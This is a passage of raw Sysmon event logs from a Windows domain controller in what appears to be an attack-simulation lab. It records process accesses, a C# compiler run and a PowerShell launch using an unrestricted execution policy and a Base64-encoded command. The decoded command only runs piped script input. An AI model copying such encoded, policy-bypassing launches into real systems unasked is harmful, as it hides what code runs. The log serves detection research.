15:52:57.009{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004894Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.009{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004893Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.009{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004892Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.009{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004891Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.009{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004890Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.009{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004889Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.009{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004888Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.009{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004887Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.009{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004886Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.009{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CD9-5FA1-FA00-000000008801}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004885Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.994{D28789B6-7CD8-5FA1-F500-000000008801}49564500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD9-5FA1-FA00-000000008801}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF8DCA1B68F) 154100x80000000000000004884Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.009{D28789B6-7CD9-5FA1-FA00-000000008801}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\w4gjlxky.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{D28789B6-7CD8-5FA1-F500-000000008801}4956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x80000000000000004883Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.994{D28789B6-7CD8-5FA1-F500-000000008801}4956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\w4gjlxky.cmdline2020-11-03 15:52:56.994 11241100x80000000000000004882Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:56.994{D28789B6-7CD8-5FA1-F500-000000008801}4956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\w4gjlxky.dll2020-11-03 15:52:56.994 10341000x80000000000000005263Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.981{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CDA-5FA1-1301-000000008801}3548C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005262Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.981{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005261Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.981{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005260Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.981{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005259Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.981{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005258Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.981{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005257Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.981{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005256Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.981{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005255Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.981{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005254Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.981{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005253Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.981{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CDA-5FA1-1301-000000008801}3548C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005252Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.981{D28789B6-7CDA-5FA1-0E01-000000008801}15924444C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CDA-5FA1-1301-000000008801}3548C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7d48|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005251Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.994{D28789B6-7CDA-5FA1-1301-000000008801}3548C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT 